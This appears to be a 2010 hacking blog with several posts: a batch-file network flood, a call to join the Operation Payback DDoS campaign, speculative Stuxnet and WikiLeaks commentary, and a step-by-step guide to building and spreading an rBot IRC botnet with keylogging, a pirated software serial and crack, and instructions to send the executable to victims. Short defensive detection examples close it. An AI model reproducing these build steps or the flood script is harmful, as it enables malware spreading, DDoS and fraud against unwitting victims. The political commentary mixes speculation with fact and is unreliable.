Tuesday, December 14, 2010

Flood a network

Ever thought about flooding a network?
You can do it using batch programming.

Open Notepad and write the following code:

:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH


Now save the notepad file with any name having a .bat extension. 

How to flood the network?
Hhhhmmm, just run the file...
hahaha....:-)

Thursday, December 9, 2010

Operation Payback

Twitter and Facebook have deleted user accounts operated by hackers who have sworn reprisal assaults in opposition to services seen as deserting WikiLeaks recently.

The online fight known as Operation Payback has been operated by means of social networking websites, plus additional chat rooms, to organize its computer attacks. Both Twitter and Facebook have deactivated accounts that came out as the campaign’s name, apparently for relating to hacking codes and other progress that violate their terms of agreement.

But these actions were not able to stop the Anonymous collective of “hacktivists” from attacking the websites of Visa and the Swedish Govt.

WikiLeaks itself was using Facebook and Twitter as the main message channels, despite excessive pressurized demands from US to pull off support for WikiLeaks.

PayPal, Amazon, MasterCard and Visa have all stopped operating with WikiLeaks since last week, each asserting that the website infringed their terms of agreement.

Anonymous, working separately from WikiLeaks, has besieged some of these websites, claiming it objects to everything like internet censorship. On MasterCard’s online payment processing service was compromised.

Websites of J. Lieberman (critic of WikiLeaks), S. Palin (former US VP candidate), and the Swedish prosecutor investigating the sexual-offence allegations against Julian Assange have all been compromised.

The action of Twitter and Facebook, two foremost social networks, in opposition to Anonymous could menace acts of vengeance by the hacktivists.

Operation Payback referred to Twitter as a probable target, arguing that it was blocking WikiLeaks from appearing on its “trending topics”, the main themes for chat on the website.

Visa’s website was unreachable from London and extra services were also disturbed.

Anonymous, claiming the attacks, asserted it is not a group of hackers.  It portrayed itself as “decentralized” and “river like”, and as a continuing movement “in opposition to those who misuse the internet”.  Currently, the position of Anonymous is aimed towards those employing unfair means to brawl WikiLeaks.

Anonymous in no way is launching attacks against critical infrastructures, rather it is only causing disruptions in websites.

Let’s join Operation Payback.

Stuxnet, WikiLeaks and Cyberwar

Stuxnet, a Windows-specific computer worm first discovered in July 2010 by VirusBlokAda, is the first to include a programmable logic controller (PLC) rootkit.  Stuxnet includes the ability to reprogram the PLCs and hide its changes.

WikiLeaks - the website that has unveiled the inside of over 250,000 ambassadorial cables from U.S. embassies to countries worldwide.
 
Cyberwar has been defined by security expert Richard A. Clarke as "actions by a nation-state to break in another nation's networks with the intention of causing disruption or damage."

Stuxnet's apparent target is Iran.  It aims at attacking infrastructure that uses Siemens control systems.  Damage was inflicted on the nuclear system in Natanz, and a delay was caused at Iran’s Bushehr Nuclear Power Plant.  Stuxnet has been designed to steal data about production lines from the Iranian industrial plants.

Stuxnet attacked Windows systems using 4 zero-day attacks and a vulnerability used by the Conficker worm.  Stuxnet is roughly 0.5 MB in size, and coded in different programming languages (including C).

Russian digital security company Kaspersky Labs released a declaration that portrayed Stuxnet as "a cyber-weapon that will show the way to the foundation of a new arms race in the world." Utilizing cybernetics, the new fighters can have an impact upon an entire nation-state, causing severe chaos and harm with a negligible outlay of endeavor.  In 2010, we have been hit by warfare by two distinctive events: Stuxnet and WikiLeaks.

It can be observed that Stuxnet was sending information about the nuclear program to its creators.  Very quickly, it forwarded quite a lot of details about the Iranian nuclear facilities.  By then, the US knowledge about Iranian nuclear initiatives was the same as the Iranians, if not more.  And this information involved not only services and machinery, but also human resources.  It’s well possible that the 2 nuclear scientists assaulted on November 29 (one killed, one badly injured) were recognized as fundamental to the Iranian effort by Stuxnet.

Further support of the above can be easily acquired from the WikiLeaks saga.  It is no overstatement to affirm that Julian Assange is engaged in cyber warfare.  He is at war, not only with the US, but with the corrupted world leaders as a whole.  Julian Assange can be seen as a mythic figure, a man with a historical task.

The only thing that astounded many was news of China's eagerness with North Korea.  The assurance that China would support North Korea to the last trench.

Scrutinize the sequence of events.  Bradley Manning (United States Army soldier) stole many secret e-mails and forwarded them to WikiLeaks.  The e-mails started off in great part from the Defense Department (Robert Gates), and the State Department (Hillary Clinton).  The Justice Department (Eric Holder) couldn't make out what to do about the leaks.  All of them work for Barack Obama.  That's an appealing remarkable lineup.  The only one missing is Van Jones, and he'll almost certainly crop up.

Wednesday, December 8, 2010

WikiLeaks Top 10 Revelations

WikiLeaks has unveiled the inside of over 250,000 ambassadorial cables from U.S. embassies to countries worldwide. The White House cautions that the disclosure of extremely sensitive confidential documents could severely harm U.S. foreign policy interests around the globe. WikiLeaks itself has up to now published around 220 cables, but it has shared information from the entire cache with quite a lot of press.

WikiLeaks Top 10 Revelations.

1. The Saudi King pressed for a U.S. attack on Iran
King Abdullah, the aging ruler of Saudi Arabia, has repeatedly urged the U.S. to attack Iran—"cut off the head of the snake"—and destroy its nuclear facilities. It's not just Saudi Arabia, though. According to the cables, leaders in Israel, Jordan, and Bahrain have also called for military action against Iran.

2. Iran may have North Korean missiles
The Islamic nation reportedly obtained missiles from North Korea capable of attacking Russia and Western Europe. Iran is said to have 19 North Korean BM-25 missiles, and officials warn the rockets might give Tehran "the building blocks" to build larger, long-range missiles on its own.
               
3. The U.S. is in a nuclear standoff with Pakistan
The U.S. has been trying to remove highly enriched uranium from a Pakistani research reactor for three years, fearing it could end up being used in a nuclear device. Pakistan has so far refused to grant access, as its officials worry that local media would portray the move "as the United States taking Pakistan's nuclear weapons."

4. The U.S. has been secretly bombing Yemen
The U.S. has launched covert missile attacks on terrorist targets in Yemen. But in a meeting with Gen. David Petraeus, Yemeni president Ali Abdullah Saleh says "we'll continue saying the bombs are ours, not yours." These air strikes killed several civilians, and this revelation may yet "spark a backlash against Saleh."

5. China has been cyber-attacking Google, the Dalai Lama
The cables confirm that Chinese cyber-terrorists were behind an intrusion into Google's computer systems last year. The attack prompted Google to withdraw from the country in March 2010. Chinese hackers have also broken into the U.S. government, businesses, and even the personal computer of the Dalai Lama, according to the leaked cables.

6. Hillary Clinton has reportedly 'spied' on the U.N.
The secretary of state issued a classified directive ordering U.S. diplomats to gather information on the leadership of the United Nations, including credit card numbers, DNA, fingerprints, and iris scans. Officials targeted included U.N. Secretary General Ban Ki Moon and representatives from China, Russia, France, and the U.K. This may violate international treaties.

7. Silvio Berlusconi and Vladimir Putin have a special relationship
The friendship between the Italian and Russian prime ministers goes even deeper than previously thought. Cables detail the exchange of "lavish gifts," deals over lucrative energy contracts, and "the use by Berlusconi of a 'shadowy' Russian-speaking Italian go-between."

8. Afghanistan VP carried $52 million in traveling money
When Ahmed Zia Massoud, Afghanistan's vice president, made a trip to the United Arab Emirates last year, he was discovered to be in possession of $52 million in cash. In a cable, the American Embassy in Kabul confirmed Massoud was allowed to keep this "significant amount" without explaining why or how he came to be carrying it. Massoud denies carrying the cash.

9. The U.S. bartered with Guantanamo prisoners 
The State Department was so desperate to empty Guantanamo Bay that it attempted to barter with various countries to take prisoners. Slovenia was told it might receive a visit from President Barack Obama if it accepted detainees, and the island nation of Kiribati was offered millions of dollars in incentives to accept Chinese Muslim prisoners. American diplomats suggested taking in prisoners would be "a low-cost way for Belgium to attain prominence in Europe."

10. World leaders aren't exactly treated with deference
The cables include a number of "diplo-disses". Kim Jong Il, North Korea's dictator, is labeled a "flabby old chap" by one source. Berlusconi is "feckless, vain, and ineffective as a modern European leader." Zimbabwean leader Robert Mugabe shows "deep ignorance on economic issues," and the American embassy in Moscow refers to President Dmitry Medvedev playing "Robin to Putin's Batman."

Hats off, Julian Assange.

Monday, December 6, 2010

Botnet

Hello surfer,
Welcome to my blog.
As you may notice, you are on planet BotInfect – Security, Hacking, & Forensics.
Quite easy… huh.

Have you ever come across the term botnet?
One logic here, if this is the first time you are hearing this word “botnet”, then you may probably be in a botnet.

What is a botnet?
A botnet is also termed a zombie army.  Imagine you are part of a zombie army…. Seems scary!!!  Basically, a botnet is a group of compromised machines under the control of an illegitimate user.  In other words, if you are part of a botnet, your machine will be used to execute tasks such as spamming or forwarding viruses to other computers on the web.  It has equally been observed that most computers on a botnet are home-based.  Reports by Kaspersky Labs and Symantec have revealed that the biggest threat on the Internet is not spam, viruses, or worms….The real menace emanates from botnets.

Are you on a botnet??
If you are part of a botnet, your computer is transformed into your worst enemy.  This is no fun, since your computer spies on you by collecting everything you do with your machine and forwards the data to the bot-herder (the person who originated the network).  The bot-herder can equally use your computer to execute his commands.

How to setup a botnet?
Being a botnet owner is among the many coooool things one may like to do.  However, I make it clear that this is illegal stuff.  Today, the FBI arrested a 23-year-old Russian man for the Mega-D botnet, believed to be responsible for one-third of the world's spam in 2008.
 
First lets download all the thing you need
  1. Visual Studio 6
  2. Visual Studio 6 Service Pack 5
  3. Visual Studio 6.0 Processor Pack
  4. Windows XP Core SDK
  5. IRCPlus 1.5 + Crack
  6. mIRC
  7. http://www.no-ip.com account (ill go into this a bit more later on)
  8. Bot Source - http://rapidshare.com/#!download|121l33|28549191|rx-asn-2-re-worked_v3.rar|319

Second Lets Setup Microsoft Visual C++ 6.0
  1. Run Microsoft Visual C++ 6.0 setup.exe and install it (Serial: 812-2224558)
  2. Install the Service Pack 6
  3. Install Windows XP SDK
  4. Open up Microsoft Visual C++ Compilier 6.0
  5. Go to Tools > Options and Click the "Directories" tab
  6. Browse to these directories and add them to the list: (Click the dotted box to add, make sure they go in this order)
         Code:
             C:\PROGRAM FILES\MICROSOFT PLATFORM SDK
             C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\BIN
             C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\INCLUDE
             C:\PROGRAM FILES\MICROSOFRT PLATFORM SDK\LIB

Time To Make a No-Ip Account
This will help stop people getting your IP address.
  1. Goto No-Ip.com an make an account
  2. Setup a free Host redirect e.g botnet.no-ip.biz
  3. Click on downloads to download your No-IP Dynamic DNS Update Client
  4. Run and install the file you downloaded, now leave this for now.

Time to install your IRC_plus 1.5
This is were your host will be (were your actual IRC will be stored). Now you dont need to find/Root a box (anyways lets carry on)
  1. Install IRC_plus
  2. Use the crack "It will say it never worked, even tho it did"
  3. Now open IRC plus "Remote Control"
  4. Download THIS guide (made by me, for you :D) to show you pictures of how it should be set-up step by step so it works correctly.

Time to setup the mIRC client
The client is so you can connect to your host that you just setup. Without this you would never be able to see the chat room haha.
  1. Install mIRC
  2. Open mIRC and fill in the usual crap: like name, email, nick blah blah and press ok
  3. Now click File> Select Server> Click Add> "fill it out as below"
    Description: What ever you want              
    IRC SERVER: enterwhatyoumade.no-ip.biz (Use the no-ip DUS you made)
    Ports: 6667 (this is the most common used but it can be 6000-6010, use whats in your bots config an the one you used in your host)
    Group: what ever you want
    Password: Password you made in IRCplus
  4. Press Add> Press OK
  5. Leave mIRC open, open No-IP DUC and Open IRCplus
  6. Go back to mIRC and press the lightining bolt in the top left area.

You should now be connected to your server. Now type:
/OPER admin password (Make sure to change password to the one you made on your host)

/join #youchannel (make sure you replaced your channel with the one you made on your host)

You should now be in your IRC chat room (channel). If you are, then you're doing good; if not, start this tutorial again and follow every step to the letter, and don't skip ahead at any time.


Now the Bit You Have Been Waiting For: Setting Up Your Bot
1. Unpack "rx-asn-2-re-worked_v3.rar" Bot Source
2. You should see an rx-asn-2-re-worked v3 folder
3. Open the rx-asn-2-re-worked v3
4. Open configs.h folder and edit these lines only:
Code:
// bot configuration (generic) - doesn't need to be encrypted2001
int port = 6667; // server port (Change to 6667 or the port your IRC uses)

Code:
#else // Recommended to use this only for Crypt() setup, this is unsecure.

char botid[] = "Mr Bumbastic"; //Change to what you want the bot to be called
char version[] = "0.1"; // Change What version you want it to be called
char password[] = "password"; // change to a password you will use inside your irc so bots know its you
char server[] = "yournoipduc.no-ip.biz"; // Change to the No-ip DUC address that you made.
char serverpass[] = "paswords"; // Change to the server password you made on ICRplus host
char channel[] = "#bots"; // Change to the channel you made on ICRplus host
char chanpass[] = ""; // Best to leave this blank, we dont need we have a server password
char server2[] = ""; // Does not work so make it blank
char channel2[] = ""; // Does not work so make it blank
char chanpass2[] = ""; // Does not work so make it blank
char filename[] = "crss"; // What you want your bot to be called in Task manger (i think hmmm)
char keylogfile[] = "keylog"; // keylog filename (says it all haha
char valuename[] = "Microsoft"; // value name for autostart (not to important so leave it as microsoft)
char nickconst[] = "zombie"; // change to first part to the bot's nickname in IRC
char szLocalPayloadFile[]=".exe"; // What you want your bot to be called in Task manger
char modeonconn[] = "-xi+B"; // Havnt got a clue so just leave it
char exploitchan[] = "#bots"; // Channel where exploit messages get redirected
char keylogchan[] = "#bots"; // Channel where keylog messages get redirected
char psniffchan[] = "#bots"; // Channel where psniff messages get redirected

5. Save it and close Visual Studio 6

6. Now open the rx-asn-2-re-worked v3 folder again > open rBot.dsw

7. Now right click Rbot file and click build.

8. Your botnet will be save in rx-asn-2-re-worked v3> Debug folder

9. Send this to people rBot.exe to people


Lastly Using the bot
Firstly i am just going to give you very basic commands to use. Make sure you have mIRC, No-IP DUC, IRCplus running and have some bots already.

1. Ok now connect to your server using mIRC

2. Make sure your the admin (/oper admin password)

3. Use the commands
Code:
.Login botpassword
(You have to do this first so the bots listen to you, make sure botpassword is what you set in config.h)

.Remove (incase you opened it on your pc, also removes from other pc's and leaves nothing behind)
Download a complete list of commands on http://rapidshare.com/#!download|47l34|21542921|cmands.html|45

Your botnet is ready.  You can use it for:
DDoS Attacks
Spamming and Spreading Malware
Information Leakage
Click Fraud
Identity Fraud


How to know if you are part of a botnet?
You know how to create a botnet, and now, if you are part of a botnet…..How do you make this out?

Check your Internet connection.  If it is slow, then a botnet infection may be using your connection to send / receive data.

If the above holds true, close all your programs and open Task Manager by pressing the CTRL, ALT and Delete keys at the same time.
Click on the network tab.  Check if your PC is using the internet network connection.  If the percentage is high, then you are probably in a botnet.

If your PC is infected, then it is most probable that your current security software has already let you down.  You may try the following free anti-botnet tools:
RUBotted (Beta) from Trend Micro,
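A more specific check than overall network usage, as an added example that is not part of the original post: list the machine's TCP connections with `netstat -ano` and flag outbound connections to the IRC ports this post names (6667 and 6000-6010). The sample output and addresses below are constructed for illustration.

```python
import re

# IRC ports named in the post: 6667 and the 6000-6010 range.
IRC_PORTS = {6667} | set(range(6000, 6011))

# Constructed sample of Windows `netstat -ano` output (not from a real host).
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       884
  TCP    192.168.1.20:49712     203.0.113.45:6667      ESTABLISHED     3120
  TCP    192.168.1.20:49730     198.51.100.7:443       ESTABLISHED     2044
  TCP    192.168.1.20:49755     203.0.113.45:6005      SYN_SENT        3120
  TCP    127.0.0.1:49801        127.0.0.1:6667         ESTABLISHED     5100
  UDP    0.0.0.0:5353           *:*                                    1500
"""

# One TCP row: protocol, local endpoint, remote endpoint, state, owning PID.
ROW = re.compile(
    r"^\s*TCP\s+(?P<local>\S+)\s+(?P<remote>\S+)\s+(?P<state>[A-Z_]+)\s+(?P<pid>\d+)\s*$"
)


def split_endpoint(endpoint):
    """Split 'host:port' (IPv4 or bracketed IPv6) into (host, port)."""
    host, _, port = endpoint.rpartition(":")
    return host.strip("[]"), int(port)


def suspicious_irc_connections(netstat_text):
    """Return outbound TCP connections whose remote port is an IRC port."""
    findings = []
    for line in netstat_text.splitlines():
        m = ROW.match(line)
        if not m or m["state"] not in ("ESTABLISHED", "SYN_SENT"):
            continue  # headers, UDP rows, listeners and closed sockets
        host, port = split_endpoint(m["remote"])
        if host.startswith("127.") or host == "::1":
            continue  # loopback traffic never leaves the machine
        if port in IRC_PORTS:
            findings.append({"pid": int(m["pid"]), "remote": host,
                             "port": port, "state": m["state"]})
    return findings


if __name__ == "__main__":
    for f in suspicious_irc_connections(SAMPLE_NETSTAT):
        print(f"PID {f['pid']} -> {f['remote']}:{f['port']} ({f['state']})")
```

A hit is a lead, not proof: a legitimate IRC client produces the same rows. Look up the reported PID in Task Manager to see which program owns the connection.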


How to track a botnet?
Now that you are more at ease with botnets, it’s equally important to track botnets to catch the bot-herder.  The most effective way to track a botnet is to use a honeypot / honeynet and to intercept the botnet's domain names so that the DNS queries for them can be analyzed.
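The DNS-query analysis described above, as an added example that is not part of the original post: bots that look up a dynamic-DNS hostname to find their server tend to repeat the query at near-regular intervals, and several clients resolving the same name that way point to one shared controller. The log format, hostnames and thresholds are assumptions made for illustration; only the `no-ip.biz` suffix comes from the post.

```python
from collections import defaultdict
from statistics import mean, pstdev

# Dynamic-DNS suffix taken from the post; extend with others seen locally.
DYNDNS_SUFFIXES = (".no-ip.biz",)

# Constructed resolver log: "<epoch seconds> <client ip> <queried name>".
SAMPLE_LOG = """\
1000 10.0.0.5 c2-example.no-ip.biz
1001 10.0.0.9 www.example.com
1060 10.0.0.5 c2-example.no-ip.biz
1120 10.0.0.5 c2-example.no-ip.biz
1130 10.0.0.7 c2-example.no-ip.biz
1181 10.0.0.5 c2-example.no-ip.biz
1190 10.0.0.7 c2-example.no-ip.biz
1200 10.0.0.9 home-cam.no-ip.biz
1250 10.0.0.7 c2-example.no-ip.biz
1310 10.0.0.7 c2-example.no-ip.biz
2900 10.0.0.9 home-cam.no-ip.biz
"""


def parse(log_text):
    """Yield (timestamp, client, name) tuples, skipping malformed lines."""
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 3 or not parts[0].isdigit():
            continue
        yield int(parts[0]), parts[1], parts[2].lower().rstrip(".")


def beacon_candidates(log_text, min_queries=4, max_jitter=0.2):
    """Map each dynamic-DNS name to the clients that query it like a beacon.

    A (name, client) pair qualifies when it has at least `min_queries`
    lookups and the gaps between them vary by at most `max_jitter`
    (standard deviation divided by mean gap).
    """
    stamps_by_pair = defaultdict(list)
    for ts, client, name in parse(log_text):
        if name.endswith(DYNDNS_SUFFIXES):
            stamps_by_pair[(name, client)].append(ts)

    hits = defaultdict(set)
    for (name, client), stamps in stamps_by_pair.items():
        if len(stamps) < min_queries:
            continue  # too few lookups to judge regularity
        stamps.sort()
        gaps = [b - a for a, b in zip(stamps, stamps[1:])]
        avg = mean(gaps)
        if avg > 0 and pstdev(gaps) / avg <= max_jitter:
            hits[name].add(client)
    return {name: sorted(clients) for name, clients in hits.items()}


if __name__ == "__main__":
    for name, clients in beacon_candidates(SAMPLE_LOG).items():
        print(f"{name}: regular lookups from {', '.join(clients)}")
```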